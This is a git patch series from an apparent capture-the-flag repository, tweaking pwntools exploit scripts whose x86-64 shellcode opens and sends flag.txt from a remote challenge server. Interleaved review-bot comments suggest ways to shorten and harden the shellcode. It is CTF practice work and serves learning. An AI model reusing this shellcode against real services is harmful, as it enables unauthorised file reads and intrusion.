From 8ba0d691c280977ab9ac974d34a2c6dbc6efc5e7 Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 23 Oct 2024 14:14:56 +0000
Subject: [PATCH 1/2] learnt about the cqo instruction that sign-extends rax into rdx
---
 africabattlectf_2024/sweet_game/a.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/africabattlectf_2024/sweet_game/a.py b/africabattlectf_2024/sweet_game/a.py
index c7729eb..bbb8d07 100644
--- a/africabattlectf_2024/sweet_game/a.py
+++ b/africabattlectf_2024/sweet_game/a.py
@@ -26,9 +26,9 @@ r.sendlineafter(b": ", buf)
 # openat + sendfile
 shellcode="""
-lea rsi, [rdx+38]
+lea rsi, [rdx+37]
 mov edi, -100
-xor rdx, rdx
+cqo
 xor r10, r10
 add ax, 257
 syscall
@@ -43,4 +43,4 @@ shellcode = asm(shellcode)
 shellcode += b"flag.txt\0"
 r.sendlineafter(b": ", shellcode)
-r.interactive()
\ No newline at end of file
+r.interactive()
From 24121c97b342a9022abb521275864336d58f103f Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 23 Oct 2024 14:17:52 +0000
Subject: [PATCH 2/2] learnt about the cqo instruction that sign-extends rax into rdx
---
 africabattlectf_2024/universe/a.py | 6 +++---
 africabattlectf_2024/universe/read_files.py | 4 ++--
 2 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/africabattlectf_2024/universe/a.py b/africabattlectf_2024/universe/a.py
index 88a91fb..cda14fd 100644
--- a/africabattlectf_2024/universe/a.py
+++ b/africabattlectf_2024/universe/a.py
@@ -8,8 +8,8 @@ r = remote("challenge.bugpwn.com", 1004)
 # openat + sendfile
 shellcode="""
-lea rsi, [rdx+30]
-xor rdx, rdx
+lea rsi, [rdx+29]
+cqo
 xor r10, r10
 add ax, 257
 syscall
@@ -24,4 +24,4 @@ shellcode += b"/flag.txt\0"
 shellcode += b"\x90"*(4096-len(shellcode))
 r.sendline(shellcode)
-r.interactive()
\ No newline at end of file
+r.interactive()
diff --git a/africabattlectf_2024/universe/read_files.py b/africabattlectf_2024/universe/read_files.py
index e1223f6..3e01113 100644
--- a/africabattlectf_2024/universe/read_files.py
+++ b/africabattlectf_2024/universe/read_files.py
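Review bot: The path offset in `lea rsi, [rdx+37]` is maintained by hand — this very commit had to lower it from 38 because `cqo` is one byte shorter than `xor rdx, rdx` — so any later change to the instruction bytes silently points rsi into the middle of `flag.txt` or past it, and it also relies on rdx holding the buffer address at entry, which the hunk does not show. Let the assembler resolve it instead: change the line to `lea rsi, [rip+path]`, put `path: .asciz "flag.txt"` after the last instruction inside the string, and drop the later `shellcode += b"flag.txt\0"`. Separately, `cqo` only zeroes rdx (openat's flags argument) when rax is non-negative, and `add ax, 257` only yields the openat number when rax is already 0, so both lines depend on the same unstated entry-state assumption; a comment such as `cqo ; rdx = 0 (flags = O_RDONLY); assumes rax == 0 on entry, as add ax,257 does` would make that explicit. The `shellcode` string continues past the end of the hunk.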
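Review bot: `lea rsi, [rdx+29]` carries the same hand-computed offset problem as the sibling exploit: it must be recounted every time the instruction bytes change (as this commit shows), and it presumes rdx points at the buffer on entry, which nothing in the hunk establishes. A `lea rsi, [rip+path]` with `path: .asciz "/flag.txt"` appended inside the assembly string removes both dependencies, and the later `shellcode += b"/flag.txt\0"` line can then go; the 4096-byte NOP padding still works because the string is now part of the assembled bytes. Since the path is absolute, leaving rdi (dirfd) unset is fine, but that is worth a comment so the missing `mov edi, -100` is not read as an oversight. The `cqo` line, like `add ax, 257`, only does the right thing if rax is 0 (or at least non-negative) when the shellcode starts; a short `; assumes rax == 0 on entry` note on it would document the assumption. The string continues beyond the hunk.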
@@ -14,7 +14,7 @@ add r9, 0x4500
 mov r15, 0x2f
 push r15
 lea rsi, [rsp]
-xor rdx, rdx
+cqo
 xor r10, r10
 add ax, 257
 syscall
@@ -31,4 +31,4 @@ shellcode = asm(shellcode)
 shellcode += b"\x90"*(4096-len(shellcode))
 r.sendline(shellcode)
-r.interactive()
\ No newline at end of file
+r.interactive()
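Review bot: The new `cqo` relies on rax being non-negative at that point, and nothing visible in the hunk sets rax before it; the following `add ax, 257` suggests the shellcode already assumes rax == 0 on entry, so the substitution is consistent with that, but the assumption is now load-bearing for the openat flags argument as well and deserves a comment, e.g. `cqo ; rdx = 0 (O_RDONLY); relies on rax == 0 on entry, same as add ax,257`. On style, if r15 is not needed later in the string (I cannot see the rest of it), `mov r15, 0x2f` / `push r15` / `lea rsi, [rsp]` can become `push 0x2f` / `mov rsi, rsp`: `push imm8` sign-extends to the same 8-byte `/` qword and the pair is several bytes shorter, which fits the byte-shaving intent of this commit. The enclosing `shellcode` string starts and ends outside the hunk.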